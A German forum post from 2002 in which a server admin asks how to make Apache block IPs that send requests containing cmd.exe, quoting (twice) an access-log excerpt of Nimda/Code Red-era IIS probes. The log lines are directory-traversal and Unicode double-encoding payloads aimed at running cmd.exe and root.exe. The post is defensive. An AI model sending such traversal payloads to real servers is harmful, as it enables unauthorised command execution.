schiffler
07.08.02, 10:59
ist es bei euch auch normal das midestens 2 bis 3 mal pro Stunde irgendwelche script kiddies versuchen den server zu hacken? was kann man dagegen tun?
kann ich dem apache sagen, das er eine IP nicht zulässt, sobald von dieser eine bestimmte anfrage gekommen ist? z.B. wenn eine anfrage cmd.exe enthält?
hier mal auszug aus den logfiles:
217.225.105.232 - - [07/Aug/2002:11:07:49 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:07:53 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:07:58 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:03 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:08 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:13 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:16 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:20 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:25 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:30 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:34 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:37 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:39 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:43 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:46 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:52 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
kann ich dem apache sagen, das er eine IP nicht zulässt, sobald von dieser eine bestimmte anfrage gekommen ist? z.B. wenn eine anfrage cmd.exe enthält?
hier mal auszug aus den logfiles:
217.225.105.232 - - [07/Aug/2002:11:07:49 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:07:53 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:07:58 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:03 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:08 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:13 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:16 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:20 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:25 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:30 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:34 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:37 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:39 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:43 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:46 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
217.225.105.232 - - [07/Aug/2002:11:08:52 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"